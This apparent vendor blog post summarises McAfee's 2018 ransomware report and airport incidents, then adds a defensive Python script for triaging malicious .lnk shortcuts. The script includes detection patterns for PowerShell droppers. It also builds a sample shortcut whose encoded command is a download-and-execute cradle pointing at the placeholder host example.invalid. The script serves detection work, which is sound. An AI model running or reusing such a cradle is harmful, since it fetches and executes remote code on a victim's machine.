While cybercriminals across the globe continue to design new threats to paralyze networks and harvest sensitive data, a tried-and-true method remains as prolific as ever: ransomware. Although the emergence of brand-new ransomware strains has slowed, the latest data from McAfee Labs shows that ransomware attacks continue apace and the total number of ransomware samples is still growing, leading to concern among enterprises and major cities that a serious attack could be in the offing.
Ransomware variants increasing
The McAfee Labs Threats Report for September 2018 showed that the number of ransomware samples increased 57 percent over the last four quarters, and McAfee also saw existing ransomware families spawn new variants. Ransomware is commonly grouped into families: a new family appears periodically and "spawns" variants that share its code lineage but are modified (repacked, re-obfuscated, or given new encryption routines and delivery methods) so that the signatures and other defenses tuned to earlier family members no longer catch them.
For example, a dozen new variants of the Scarab ransomware family were spawned in the second quarter of 2018 alone. They account for more than half of the total number of Scarab variants identified since mid-2017, when the Scarab family first appeared. In 2017, several serious ransomware outbreaks occurred: the WannaCry and NotPetya attacks swept across the globe, wreaking havoc.
Both were new malware samples built to spread by exploiting a software vulnerability (the SMBv1 flaw targeted by the leaked EternalBlue exploit, for which Microsoft had already shipped a patch before the outbreaks), and McAfee noted that the exploits from these two high-profile threats were repeatedly repurposed within new malware strains. Subsequently, newly discovered vulnerability exploits were adapted in the same way to produce new threats, and cybercriminals were given compelling examples of how quickly malware of this kind can use an exploit to gain a foothold on one system and then propagate across a network on its own.
Because families keep spawning variants, exploits for vulnerabilities patched as far back as 2014 keep reappearing in new samples, and they still succeed against systems that were never updated. McAfee Advanced Threat Research Lead Scientist and Senior Principal Engineer Christiaan Beek stated, "It's still surprising to see numerous vulnerabilities from as far back as 2014 used successfully to spearhead attacks, even when there have been patches available for months and years to deflect exploits. This is a discouraging testament to the fact that users and organizations still must do a better job of patching vulnerabilities when fixes become available."
Airports fight back against ransomware attacks
In mid-September 2018, flight information screens at Bristol Airport in the UK were blacked out over a weekend. According to ZDNet, "Airport officials blamed the incident on a ransomware infection that affected the computers running the airport's in-house TV screens displaying arrival and departure flight information." Airport officials refused to pay the attacker's ransom demand and instead took the systems down while they cleaned the affected computers. From the initial infection on Friday morning through Saturday night, the airport warned passengers to arrive early and used paper posters and whiteboards to announce check-in and arrival information. No flights were delayed, and the affected systems were restored on Sunday morning.
In March 2018, Hartsfield-Jackson Atlanta International Airport shut off its Wi-Fi service as a security precaution during an active ransomware attack on the City of Atlanta. Multiple city computers had their files encrypted and held for ransom by the SamSam ransomware. According to Secplicity, "The airport had 'pulled the plug' on their Wi-Fi service likely to avoid the attack spreading to airport authority computers, airline computers, and possibly customers' computers." The attackers reportedly demanded a ransom of $50,000 in Bitcoin, but it is unknown whether the city tried to pay: the ransom payment portal was taken offline, and the city spent $2.6 million recovering from the attack.
Microsoft has PowerShell, Cortana issues
Microsoft's task automation and configuration management framework PowerShell was a main target for fileless malware developers, and new LNK malware continues to grow, as cybercriminals use .lnk shortcut files to launch malicious PowerShell scripts and other malware: the shortcut's target and arguments point at powershell.exe, so a double-click runs attacker-supplied commands without any payload executable touching disk. McAfee reported a 489 percent increase over the past four quarters in malicious samples of this kind. McAfee Labs also informed Microsoft in April 2018 of a severe vulnerability in the Cortana voice assistant in Windows 10. Microsoft released a patch for the flaw in June, acknowledging that it had allowed "attackers to execute code from the locked screen of a fully patched Windows 10 machine."
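As an added example (not from the McAfee report or the page's author), the following Python script shows the check an analyst would run on a suspicious shortcut: it parses the .lnk Shell Link header and StringData, flags the PowerShell switches that dropper shortcuts rely on (hidden window, no profile, execution-policy bypass, encoded command), and decodes the -EncodedCommand payload so the real command line is visible. The two shortcut samples are constructed inline with a builder function, the host example.invalid is a placeholder, and the parser deliberately skips the LinkTargetIDList, so shortcuts that carry their target only there would need the ID-list parser added.

```python
"""Triage Windows shortcut (.lnk, MS-SHLLINK) files for PowerShell-based droppers."""
import base64
import re
import struct

# LinkFlags bits from the MS-SHLLINK header.
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}, little-endian
SW_SHOWMINNOACTIVE = 7  # window starts minimised and unfocused; droppers use it to stay out of sight

# Command-line traits of PowerShell droppers; abbreviated switches (-w, -ep, -enc) are accepted.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
TRAITS = {
    "encoded command": ENCODED_RE,
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "execution policy bypass": re.compile(r"-e(?:x|p|xecutionpolicy)\s+bypass", re.I),
    "download cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
}


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a Shell Link file."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_command = struct.unpack_from("<I", data, 0x3C)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # skipped here; the target may also live in this list
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:
        off += struct.unpack_from("<I", data, off)[0]
    fields = {"flags": flags, "show_command": show_command}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, no terminator
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        off += count * width
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    return fields


def decode_encoded_command(command_line: str):
    """Recover the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(data: bytes) -> dict:
    """Score one .lnk: which dropper traits it shows and what the decoded payload is."""
    lnk = parse_lnk(data)
    command_line = " ".join(lnk.get(k, "") for k in ("relative_path", "arguments"))
    findings = []
    if re.search(r"powershell(?:\.exe)?|\bpwsh\b", command_line, re.I):
        findings.append("launches PowerShell")
    findings += [label for label, pat in TRAITS.items() if pat.search(command_line)]
    if lnk["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window minimised (ShowCommand=7)")
    decoded = decode_encoded_command(lnk.get("arguments", ""))
    if decoded:  # traits hidden inside the base64 blob are only visible after decoding
        findings += [f"{label} (in decoded command)" for label, pat in TRAITS.items()
                     if pat.search(decoded) and label not in findings]
    if "launches PowerShell" in findings and len(findings) > 1:
        verdict = "malicious"
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"target": lnk.get("relative_path"), "arguments": lnk.get("arguments"),
            "decoded_command": decoded, "findings": findings, "verdict": verdict}


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Assemble a minimal Unicode .lnk (header + RelativePath + Arguments) for testing."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


# Constructed samples (not real malware): a dropper-style shortcut and a benign one.
STAGE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
DROPPER_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-nop -w hidden -ep bypass -enc " + base64.b64encode(STAGE_CMD.encode("utf-16-le")).decode("ascii"),
    show_command=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", r"C:\notes.txt")

if __name__ == "__main__":
    for name, blob in (("dropper", DROPPER_LNK), ("benign", BENIGN_LNK)):
        print(name, triage(blob))
```

Run it against a directory of shortcuts from mail attachments or user Desktops and the dropper sample comes back as "malicious" with the download cradle visible in decoded_command, while the notepad shortcut is "clean". The verdict rule is deliberately simple (PowerShell plus at least one evasion trait); in production the parsed fields feed a detection rule rather than a fixed label.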
Agile IT modernization can help businesses of all sizes adapt to the data security demands that accompany the advent of ransomware attacks. Inventu's Flynet Viewer meets the needs of organizations and their employees in a way that feels both familiar and simple.